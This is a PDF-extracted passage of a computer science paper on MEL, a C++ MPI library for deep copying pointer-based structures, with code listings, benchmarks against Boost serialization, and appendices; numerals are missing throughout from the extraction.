message::packrootvar(t &obj) { transport(obj); // transport the footprint } // transport the footprint of a deep object and call its // deepcopy function template<typename d> inline enable_if_deep<d> message::packrootvar(d &obj) { transport(obj); // transport the footprint obj.deepcopy(*this); // recurse on the deep structure } // transport a root pointer to len deep objects template<typename d> inline enable_if_deep<d> message::packrootptr(d *&ptr, int len = ) { // explicitly transport the pointer value for the root node // so the it can be hashed correctly on recieving processes whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size_t addr = (size_t) ptr; transport(addr); ptr = (d*) addr; // same as packsharedptr, except we don't need to check the pointer d *oldptr = ptr; transportalloc(ptr, len); pointermap.insert(oldptr, ptr); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } // transport a root stl container to len deep objects template<typename d> inline enable_if_deep<d> packrootstl(std::vector<d> &obj) { // explicitly transport the length of the container int len; if (transport_method::source) { len = obj.size(); transport(len); } else { transport(len); obj.resize(len, d()); for (int i = ; i < len; ++i) (&obj[i])->~d(); } d *p = &obj[ ]; if (len > ) transport(p, len); // followed by the recursion for deep types for (int i = ; i < len; ++i) { obj[i].deepcopy(*this); } } transport method implementation & usage a transport method is a class which provides a single public-member function of the form template<typename t> inline void transport(t *&ptr, const int len) which defines how to move len objects of type t from a given pointer ptr. listing shows the implementation of the transportsend transport method, which defines whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ how to move data using a discrete mpi_send for each transport. an instance of a transport method carries any state needed to represent the data movement over the duration of the deep copy. in the case of transportsend the state needed to represent the transfer are the mpi rank of the destination process, a tag to use for the communication, and the mpi communicator over which the data will be transferred. for other transport methods the state may be a file handle, or a pointer to an array used for buffering. listing mel implementation–transport method for message. class transportsend { private: // members - store any state or resources needed to maintain // this transport method const int pid, tag; const mel::comm comm; public: // a transport method is either a source or a destination // this is known at compile time static constexpr bool source = true; transportsend(const int _pid, const int _tag, const mel::comm &_comm) : pid(_pid), tag(_tag), comm(_comm) {} // transport function describes how to move data, in this case by // performing an mpi_send template<typename t> inline void transport(t *&ptr, const int len) { mel::send(ptr, len, pid, tag, comm); } }; listing shows the implementation of one of the top-level interface functions for performing deep copy as an mpi_send operation. a message<transportsend> object is instantiated, and the parameters from the function are transparently forwarded to the instance of the transport method within the message object using std::forward<args>(args). after creating the message object the pointer to the deep structure can be transported by calling message::packrootptr from the transport api. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing mel implementation–usage of a transport method in the top-level interface. template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> send(p &ptr, const int dst, const int tag, const comm &comm) { // arguments to the message constructor are std::forward'd to the // transportsend constructor message<transportsend, hash_map> msg(dst, tag, comm); // transport the deep-structure msg.packrootptr(ptr); } when performing a buffered deep copy the data is first packed into a contiguous buffer on the sending process before being transported as a single operation to the receiving processes where the data can then be expanded back into the deep structure. listing shows the implementation of bufferedsend and bufferedrecv which make use of the transportbufferwrite and transportbufferread transport methods. listing mel implementation–usage of a buffered transport method in the top-level interface. template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedsend(p &ptr, const int dst, const int tag, const comm &comm) { // compute the buffer size for the deep structure and transport it mel::deep::bufferedsend(ptr, dst, tag, comm, mel::deep:: buffersize(ptr)); } template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedsend(p &ptr, const int dst, const int tag, const comm &comm, const int buffersize) { // allocate the buffer for packing char *buffer = mel::memalloc<char>(buffersize); // deep-copy into the buffer message<transportbufferwrite,hash_map>msg(buffer,buffersize); msg.packrootptr(ptr); // send the buffer in one message. uses message<transportsend> whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // buffersize represents an upperbound on how much data there // is to transport, // msg.getoffset() gives us how much data was actually packed into // the buffer mel::deep::send(buffer, msg.getoffset(), dst, tag, comm); // clean up the buffer mel::memfree(buffer); } template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedrecv(p &ptr, const int src, const int tag, const comm &comm) { // recieve the packed buffer in one message. uses // message<transportrecv> int buffersize; char *buffer = nullptr; mel::deep::recv(buffer, buffersize, src, tag, comm); // buffersize onthereceivingprocessesisequaltomsg.getoffset() // on the sending process // deep-copy out of the buffer message<transportbufferread, hash_map> msg(buffer, buffersize); msg.packrootptr(ptr); // clean up the buffer mel::memfree(buffer); } the last parameter to buffered transport methods on sending processes is an integer value representing the byte size of the contiguous buffer to use for packing the deep structure. if this value is omitted an overloaded version of the function computes the upper-bound of the buffer size needed by calling mel::deep::buffersize before forwarding its parameters to the main function overload. note that on the sending process for a buffered transport that msg.getoffset() is used as the length parameter when transporting the buffer (listing , line ) and not the buffersize parameter. this means that if the sender blindly requests a large buffer because it does not know the size of the deep structure exactly, but only a part of the buffer is filled, only the used part of the buffer will be transported to the receiving processes. in the scenario where the buffer size given was not large enough to complete the deep copy, a run-time assertion occurs. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hash-map implementation the message object is templated on a hash-map type that exposes public-member functions of the form: template<typename t> inline bool find(t* oldptr, t* &ptr) template<typename t> inline void insert(t* oldptr, t* ptr) this allows the user to provide an implementation of a hashing scheme optimized for pointers or to provide an adapter to a third-party hash-map implementation. one of the goals of mel is to be portable and to not introduce external dependencies on the users code; because of this, our default hash-map implementation (listing ) is simply a wrapper around a std::unordered_map container between two void pointers. listing mel implementation–default hash-map interface for mel::deep::message. class pointerhashmap { private: // hashmaps for storing pointers to types of any size std::unordered_map<void*, void*> pointermap; public: // pointer hashmap public interface // returns true if oldptr is found in the hash-map and sets ptr // equal to the stored value // otherwise returns false and ptr is unaltered template<typename t> inline bool find(t* oldptr, t* &ptr) { // is oldptr already in the hashmap? const auto it = pointermap.find((void*) oldptr); if (it != pointermap.end()) { // if so set ptr equal to the value stored in the hashmap ptr = (t*) it->second; return true; } return false; } // insert ptr into the hashmap using oldptr as the key template<typename t> inline void insert(t* oldptr, t* ptr) { pointermap.insert(std::make_pair((void*)oldptr,(void*)ptr)); } }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benchmarks for benchmarking we used the swansea branch of the hpc wales compute cluster. nodes contain two intel xeon e - processors for a total of physical cores with gb’s of ram per-node, connected with infiniband gbps networking. benchmarks were run using intel mpi . and compiling under intel icpc . . . case study: ray-tracing scene structure to evaluate the performance of our algorithms relative to the equivalent hand coded mpi implementations and to other libraries that offer deep copy semantics such as boost serialization library (cogswell, ), we used the example of deep copying a large binary-tree structure between processes in the context of a distributed ray-tracer. a d scene (fig. ) is loaded on one process, consisting of triangular meshes, cameras, materials, and a bounding volume hierarchy to help accelerate ray-triangle intersection tests. for each experiment, a scene was loaded containing increasing numbers of the classic utah teapot mesh. the scene structure was then communicated using the various algorithms and the performance measured by comparing the times spent between mpi_barrier’s before and after the communication. broadcast–mpi vs. mel for this example, just lines of code calling the transport api were added to the bvh treenode and scene structs (see appendix scene object containing mel deep copy methods) to enable both buffered and non-buffered deep copy using our algorithm. by comparison, the hand coded mpi non-buffered (see appendix hand coded non- buffered bcast of scene object) method took lines of code, and lines of code for the mpi buffered (see appendix hand coded buffered bcast of scene object) algorithm (not including comments, formatting, or trailing brackets), where pointers, allocations, and object construction had to be managed manually by the programmer. also, these implementations only handled the case of bcast operations, while the mel version works transparently with all operations. despite its generic interface and minimal syntax, our algorithm performs almost identically with hand coded mpi implementations in fewer lines of code and a fraction of the code complexity. relevant code for this example is given in appendix experiment : broadcasting a large tree structure. figure a shows the resulting times from broadcasting increasingly larger scenes with each algorithm, between nodes on hpc wales. we can see that the buffered methods that only send a small constant number of messages between processes are faster than non-buffered methods despite the added overheads from packing and unpacking the data. the scalability of our algorithm with respect to the number of mpi processes involved in the communication is only bounded by the scalability of the transport method itself. in the case of a broadcast operation, fig. b shows that varying the number whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ processes is of the same complexity as the underlying mpi_bcast communication (logarithmic). file write/read–mel vs. boost when fault tolerance is a concern one method for recovering from a failed process is to periodically cache the current state of what is being worked on to disk so that in the event of a failure the data can be reloaded on a new process (potentially on a different node) and the work continued from the point at which it was last saved. when the data needed to store the state of a process is deep we incur the same problems that arise during deep copy. mel implements file read and write operations for both buffered and non- buffered file access, utilizing the same user defined deep copy functions needed for the broadcast, send, and receive methods. for this experiment we also compared our performance to the boost serialization library which is designed for saving and restoring structured data from file. figure shows the results of using mel to write/read a large tree structure to or from file. unlike with mpi communications where mel’s buffered methods performed considerably faster than non-buffered variants due to the overheads from starting and ending network communications; with file access non-buffered reads perform almost identically to buffered methods. this is due to std::fstream’s use of an internal buffer to optimize file access, meaning that cost of starting and ending write/read operations is negligible compared to the cost of traversing the deep structure. while boost serialize also uses c++ streams their method of traversing the deep structure incurs significant overheads leading to poor and differing performance when reading and writing data. finally, non-buffered writes perform slightly poorer then buffered writes due to file system having to allocate additional blocks as the file grows. figure utah teapot mesh used for benchmarks. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case study: graphs with cycles in the previous example the implementation of treenode was simplified by the observation that tree nodes were only pointed to from a single parent. however, in many applications multiple objects may share a common child. to show how mel copes with structures containing pointers to shared dependents we used the example of communicating generic directed graph structures constructed in various connectivities (see fig. a– d). relevant code for this example can be found in appendix experiment : communicating generic directed graph structures. fully connected graphs figure shows the results for communicating fully connected graph structures of increasing size in terms of broadcast (fig. a) and writing a checkpoint to file (fig. b). number of teapots ( triangles each) t im e ( s e co n d s) ray tracing scene object single node file-io to local ssd mel write mel buffered write mel read mel buffered read boost write boost read figure time comparison of mel to boost serialization library for file read/write on a single node, to a within node solid state drive. a b figure time comparison of algorithms broadcasting large tree structures between processes within node and on separate nodes. mel requires the addition of four simple lines of code which greatly accelerate programming time and vastly reduces the chance of user induced bugs. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this example, n independent graph nodes will be traversed, each containing a list of pointers to all n nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. compared to the previous broadcast example for the ray tracing case study (section broadcast–mpi vs. mel) where buffered communication showed better performance, with fully connected graphs we see the opposite effect. non-buffered communication is consistently faster when the number of shared dependents is high. internally, shared pointers are tracked using a hash table to ensure that only distinct pointers are transported and duplicates linked correctly. because of the overheads attached to insert and find operations on the hash table, when the number of shared dependents is high the overhead from sending separate communications for each object in the structure is small compared to that of accessing the hash table. this has the effect of making the overhead from buffering the structure into a contiguous array for transport a bottleneck for deep copy. a similar trend is observed for file access, where non-buffered access is more efficient than buffered. in this example we also compare mel to boost serialization library. here shared pointer usage introduces significant overheads for boost that our method avoids leading to significantly improved performance. figure graph connectivities for { , , , , , : : : } nodes. a b figure time comparison for broadcast and file-io operations on fully connected graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ random graph next we look at graphs with random connectivities. figure shows the results of communicating randomly generated graphs of different sizes for broadcasting (fig. a) and writing a checkpoint to file (fig. b). with this example, n independent graph nodes will be traversed, each containing a list of pointers to a random number of nodes (at least one); during deep copy the hash-map will be queried between n and n times and will grow to contain n entries. again, we see that when the number of shared dependents within the structure is large non-buffered communication performs consistently better than for buffered. we also see slightly better performance than with the fully connected graphs, showing that time complexity scales linearly with the number of graph edges. for file access the same trends emerge, where our method performs considerably faster than boost serialization. ring graph a ring graph can be modeled a doubly-linked list where the last element is connected back to the first element in the structure. for this example, n independent graph nodes will be traversed, each containing a list of two pointers to previous and next nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. figure shows the results of communicating large ring structures for broadcasting (fig. a) and writing a checkpoint to file (fig. b). because the number of shared edges is small we initially see that buffered communication is faster than non-buffered as with section broadcast–mpi vs. mel. as the number of graph nodes in the structure passes , , the amount of time needed to buffer the structure becomes larger than the overhead associated with starting and stopping separate mpi communications making non-buffered method more efficient for larger structures. for file access, we still see that our methods perform consistently faster than boost’s even when the number of shared dependents is low. binary tree finally, we look at the example of constructing a binary tree shaped graph where there are no shared dependents. the generic container does not know this, and still must use a b figure time comparison for broadcast and file-io operations on randomly connected graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packsharedptr to transport child nodes, meaning it still incurs overheads of pointer lookup. in this example, n independent graph nodes will be traversed, each containing a list of one or two pointers to descending child nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. figure shows the results of communicating binary trees of different sizes in terms of broadcast (fig. a) and writing a checkpoint to file (fig. b). similarly to communicating ring graphs, buffered network communication is significantly faster non-buffered methods until the structure becomes large enough that buffering becomes the main bottleneck. for file access the opposite is true, with non-buffered file access being slightly faster than buffered. we attribute this to std::fstream’s use of internal buffering, which renders the overheads from our fully buffered method unnecessary in this use case. conclusions and future work in this paper we have presented our implementation of deep copy semantics that encapsulates both buffered and non-buffered methods for dealing with complex structured data in the context of mpi inter-process communication and file access. users may choose shared versions for when data structures contain cycles or faster non-shared variants for when they do not. we have shown that a generic implementation of such semantics can achieve like for like performance with hand crafted implementations while a b figure time comparison for broadcast and file-io operations on ring graph structures. a b figure time comparison for broadcast and file-io operations on binary tree graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dramatically reducing code complexity and decreasing the chance for programmer error. we also demonstrate the method to be faster than utilizing boost serialization library. mel non-buffered methods provide a generic, low memory overhead, high performance (equal to hand crafted) solution to the deep copy problem. in the future we intend to include the implementation of a non-blocking top-level interface for asynchronous deep copy, additional transport methods for communicating deep structured data to cuda and opencl based accelerators, and a hash-map implementation highly optimized for pointers. the algorithms discussed in this paper are implemented as part of the mel, which is currently in development with the goal of creating a light weight, header only c++ wrapper around the c-style functions exposed by the mpi- standard, with backwards compatibility for systems where only mpi- is available. we plan to keep mel in active development and hope that the research community will join us as we continue to grow the features and capabilities encompassed within the project. mel is open-source and available on github under the mit license at: https://github. com/cs-swansea/mel. appendices experiment : broadcasting a large tree structure full code for this example is available at https://github.com/cs-swansea/mel/ under example-code/raytracingdeepcopy.cpp. listing deep copy of ray tracing scene object. //-----------------------------------------------------------// // example usage: // // mpirun -n [number of processes] ./raytracingdeepcopy [mesh path] [method index] // // mpirun -n ./raytracingdeepcopy "teapot.obj" // //-----------------------------------------------------------// int main(int argc, char *argv[]) { mel::init(argc, argv); // setup // who are we? mel::comm comm = mel::comm::world; const int rank = mel::commrank(comm), size = mel::commsize(comm); // check param count if (argc != ) { if (rank == ) std::cout << "wrong number of parameters..."<< std::endl; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cs-swansea/mel https://github.com/cs-swansea/mel https://github.com/cs-swansea/mel/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel::exit(- ); // ^^ equivalent of calling mpi_finalize() followed by // std::exit(- ) } // which model should we load and which algorithm should we use? const std::string meshpath = std::string(argv[ ]); const int method = std::stoi(argv[ ]); // load the scene on the root process scene *scene = nullptr; if (rank == ) { std::cout << "loading scene..." << std::endl; scene = loadscene(meshpath); } mel::barrier(comm); auto starttime = mel::wtime();// start the clock! // broadcast the scene structure with the selected method switch (method) { case : mel::deep::bcast(scene, , comm); // call mel::deep method. break; case : mel::deep::bufferedbcast(scene, , comm); // call mel::deep method. break; case : mpi_nonbufferedbcast_scene(scene, , (mpi_comm) comm); // hand written below break; case : mpi_bufferedbcast_scene(scene, , (mpi_comm) comm); // hand written below break; default: if (rank == ) std::cout << "invalid method index..." << std:: endl; mel::exit(- ); } mel::barrier(comm); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ auto endtime = mel::wtime(); // stop the clock! if (rank == ) { std::cout << "broadcast scene in " << (endtime - starttime) << " seconds..." << std::endl; } // all processes now have a scene pointer that points to an // equivalent data-structure //-------------------------------------------------------// // now we can do some ray-tracing using the scene object! // //-------------------------------------------------------// // clean up mel::memdestruct(scene); // ^^ equivalent to explicitly calling the destructor followed by // mpi_free_mem. // scene->~scene(); // mpi_free_mem(scene); mel::finalize(); // tear down return ; } scene object containing mel deep copy methods listing ray tracing scene object. //--------------------------------------------// // structure representing a node in the bvh tree // //-------------------------------------------// struct treenode { int startelem, endelem; // start and end indices into vector of triangles vec v , v ; // vec is non-deep struct treenode *leftchild, *rightchild; // treenode is deep struct treenode() : treenode( , ) {} treenode(const int _s, const int _e) : startelem(_s), endelem(_e), leftchild(nullptr), rightchild(nullptr), whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ v { inf, inf, inf }, v { -inf, -inf, -inf } {} // ensure treenode can't be used incorrectly treenode(const treenode &old) = delete; // remove copyconstructor inline treenode& operator=(const treenode &old) = delete; // remove copyassignment treenode(treenode &&old) = delete; // remove moveconstructor inline treenode& operator=(treenode &&old) = delete; // remove moveassignment ∼treenode() { mel::memdestruct( leftchild); mel::memdestruct(rightchild); } // implementation of ray-treenode (ray-aabb) intersection // omitted for this example bool intersect(const ray &rayinv, double &tmin, const double dist) const; template<typename msg> inline void deepcopy(msg &msg) { msg.packptr( leftchild); msg.packptr(rightchild); } }; //---------------------------------------------------// // structure representing a scene object to be rendered // //---------------------------------------------------// struct scene { camera camera; // camera is non-deep struct std::vector<material> materials; // material is non-deep struct std::vector<triangle> mesh; // triangle is non-deep struct treenode *rootnode; // treenode is deep struct scene() : rootnode(nullptr) {} whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // ensure scene can't be used incorrectly scene(const scene &old) = delete; // remove copyconstructor inline scene& operator=(const scene &old) = delete; // remove copyassignment // move constructor scene(scene &&old) : mesh(std::move(old.mesh)), materials (std::move(old.materials)), camera(old.camera),rootnode(old.rootnode){ old.mesh.clear(); old.materials.clear(); old.rootnode = nullptr; } // move assignment operator inline scene& operator=(scene &&old) { mesh = std::move(old.mesh); materials = std::move(old.materials); rootnode = old.rootnode; camera = old.camera; old.mesh.clear(); old.materials.clear(); old.rootnode = nullptr; return *this; } ∼scene() { mel::memdestruct(rootnode); } // implementation of ray-scene intersection omitted for this example bool intersect(const ray &ray, intersection &isect) const; template<typename msg> inline void deepcopy(msg &msg) { msg & mesh & materials; msg.packptr(rootnode); } }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hand coded non-buffered bcast of scene object listing hand coded non-buffered bcast of ray tracing scene object. inline void mpi_nonbufferedbcast_scene(scene *&scene, const int root, const mpi_comm comm) { int rank; mpi_comm_rank(comm, &rank); // receiving nodes allocate space for scene if (rank != root) { mpi_alloc_mem(sizeof(scene), mpi_info_null, &scene); new (scene) scene(); } // bcast the camera struct mpi_bcast(&(scene->camera), sizeof(camera), mpi_char, root, comm); // bcast the vector sizes int sizes[ ]; if (rank == root) { sizes[ ] = (int) scene->mesh.size(); sizes[ ] = (int) scene->materials.size(); } mpi_bcast(sizes, , mpi_int, root, comm); // ′allocate′ space for vectors if (rank != root) { scene->mesh.resize(sizes[ ]); scene->materials.resize(sizes[ ]); } // bcast the vectors mpi_bcast(&(scene->mesh[ ]), sizeof(triangle) * sizes[ ], mpi_char, root, comm); mpi_bcast(&(scene->materials[ ]), sizeof(material) * sizes[ ], mpi_char, root, comm); // receiving nodes allocate space for rootnode if (rank != root) { mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(scene->rootnode)); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ new (scene->rootnode) treenode(); } // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // bcast the current node's values mpi_bcast((currentnode), sizeof(treenode), mpi_char, root, comm); // do we need to send/receive children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // allocate space for child nodes on receiving process if (rank != root) { mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->leftchild)); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->rightchild)); new (currentnode->leftchild) treenode(); new (currentnode->rightchild) treenode(); } // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } hand coded buffered bcast of scene object listing hand coded buffered bcast of ray tracing scene object. inline void mpi_bufferedbcast_scene(scene *&scene, const int root, const mpi_comm comm) { int rank; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mpi_comm_rank(comm, &rank); // receiving nodes allocate space for scene if (rank != root) { mpi_alloc_mem(sizeof(scene), mpi_info_null, &scene); new (scene) scene(); } // calculate the byte size of the tree on root process int packed_size = ; if (rank == root) { packed_size += sizeof(camera); packed_size += sizeof(int) + ((int) scene->mesh.size() * sizeof(triangle)); packed_size += sizeof(int) + ((int) scene->materials.size() * sizeof(material)); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); packed_size += sizeof(treenode); // do we need to send children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } // share the buffer size to all processes mpi_bcast(&packed_size, , mpi_int, root, comm); // allocate the buffer int position = ; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ char *buffer; mpi_alloc_mem(packed_size, mpi_info_null, &(buffer)); // if root then we pack the structure into the buffer if (rank == root) { // pack the camera struct mpi_pack(&(scene->camera), sizeof(camera), mpi_char, buffer, packed_size, &position, comm); int mesh_size = scene->mesh.size(), materials_size = scene->materials.size(); // pack the mesh vector mpi_pack(&(mesh_size), , mpi_int, buffer, packed_size, &position, comm); mpi_pack(&(scene->mesh[ ]), mesh_size * sizeof(triangle), mpi_char, buffer, packed_size, &position, comm); // pack the materials vector mpi_pack(&(materials_size), , mpi_int, buffer, packed_size, &position, comm); mpi_pack(&(scene->materials[ ]), materials_size * sizeof(material), mpi_char, buffer, packed_size, &position, comm); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // pack the current node mpi_pack(currentnode, sizeof(treenode), mpi_char,buffer,packed_size,&position,comm); // do we need to send children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // push children onto the stack so they get processed treestack.push(currentnode->leftchild); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ treestack.push(currentnode->rightchild); } } // send the buffer mpi_bcast(buffer, packed_size, mpi_char, root, comm); } // if not root then we unpack the structure from the buffer else { // receive the packed buffer mpi_bcast(buffer, packed_size, mpi_char, root, comm); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(scene->rootnode)); new (scene->rootnode) treenode(); // unpack the camera struct int mesh_size, materials_size; mpi_unpack(buffer, packed_size, &position, &(scene->camera), sizeof(camera), mpi_char, comm); // unpack mesh vector mpi_unpack(buffer, packed_size, &position, &(mesh_size), , mpi_int, comm); scene->mesh.resize(mesh_size); mpi_unpack(buffer, packed_size, &position, &(scene->mesh [ ]), mesh_size * sizeof(triangle), mpi_char, comm); // unpack materials vector mpi_unpack(buffer, packed_size, &position, &(materials_size), , mpi_int, comm); scene->materials.resize(materials_size); mpi_unpack(buffer, packed_size, &position, &(scene->materials[ ]), materials_size*sizeof(material),mpi_char,comm); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // unpack the current node mpi_unpack(buffer, packed_size, &position, currentnode, sizeof(treenode), mpi_char, comm); // do we need to receive children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // allocate space for child nodes on receiving process mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->leftchild)); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->rightchild)); new (currentnode->leftchild) treenode(); new (currentnode->rightchild) treenode(); // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } // clean up mpi_free_mem(buffer); } experiment : communicating generic directed graph structures listing functions for constructing directed graphs in different shapes. //------------------------------------------------------------// // example usage: // // mpirun -n [num of procs] ./graphcycles [graph nodes: <= n] [graph type: <= t <= ] // // mpirun -n ./graphcycles // //------------------------------------------------------------// int main(int argc, char *argv[]) { mel::init(argc, argv); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel::comm comm = mel::comm::world; const int rank = mel::commrank(comm), size = mel::commsize(comm); if (argc != ) { if (rank == ) std::cout << "wrong number of parameters..." << std::endl; mel::exit(- ); } const int numnodes = << std::stoi(argv[ ]), // ^n nodes graphtype = std::stoi(argv[ ]); digraphnode<int> *graph = nullptr; if (rank == ) { switch (graphtype) { case : graph = makebtreegraph(numnodes); break; case : graph = makeringgraph(numnodes); break; case : graph = makerandomgraph(numnodes); break; case : graph = makefullyconnectedgraph(numnodes); break; } } mel::barrier(comm); auto starttime = mel::wtime(); // start the clock! // deep copy the graph to all nodes mel::deep::bcast(graph, , comm); mel::barrier(comm); auto endtime = mel::wtime(); // stop the clock! if (rank == ) { std::cout << "broadcast graph in " << (endtime - starttime) whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ << " seconds..." << std::endl; } // file name for output std::stringstream sstr; sstr << "rank=" << rank << " type=" << graphtype << " nodes=" << numnodes << ".graph"; // save the output to disk from each node std::ofstream graphfile(sstr.str(), std::ios::out | std::ios::binary); if (graphfile.is_open()) { mel::deep::filewrite(graph, graphfile); graphfile.close(); } destructgraph(graph); mel::finalize(); return ; } factory functions for building directed graphs in different shaped structures listing functions for constructing directed graphs in different shapes. inline digraphnode<int>* makebtreegraph(const int numnodes) { /// btree graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } if (numnodes > ) nodes[ ]->edges.push_back(nodes[ ]); for (int i = ; i < numnodes; ++i) { const int j = ((i - ) * ) + ; nodes[i]->edges.reserve( ); if (j < numnodes) nodes[i]->edges.push_back(nodes[j]); if ((j + ) < numnodes) nodes[i]->edges.push_back(nodes [j + ]); } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ return nodes[ ]; } inline digraphnode<int>* makeringgraph(const int numnodes) { /// ring graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { nodes[i]->edges.reserve( ); nodes[i]->edges.push_back(nodes[(i + ) % numnodes]); nodes[i]->edges.push_back(nodes[(i == ) ? (numnodes - ) : (i - )]); } return nodes[ ]; } inline digraphnode<int>* makerandomgraph(const int numnodes) { srand( ); /// random graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { const int numedges = rand() % numnodes; nodes[i]->edges.reserve(numedges); nodes[i]->edges.push_back(nodes[(i + ) % numnodes]); for (int j = ; j < numedges; ++j) { nodes[i]->edges.push_back(nodes[rand() % numnodes]); } } return nodes[ ]; } inlinedigraphnode<int>*makefullyconnectedgraph(constintnumnodes){ /// fully connected graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { nodes[i]->edges.reserve(numnodes); for (int j = ; j < numnodes; ++j) { nodes[i]->edges.push_back(nodes[j]); } } return nodes[ ]; } generic implementation of directed graph container listing generic implementation of directed graph container for deep copy. template<typename t> struct digraphnode { t value; std::vector<digraphnode<t>*> edges; digraphnode() {}; explicit digraphnode(const t &_value) : value(_value) {}; template<typename msg> inline void deepcopy(msg &msg) { msg & edges; for (auto &e : edges) msg.packsharedptr(e); } }; inline void visitgraph(digraphnode<int> *&root, std::function<void(digraphnode<int> *&node)> func) { std::unordered_set<digraphnode<int>*> pointermap; std::stack<digraphnode<int>*> stack; stack.push(root); while (!stack.empty()) { digraphnode<int> *node = stack.top(); stack.pop(); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / 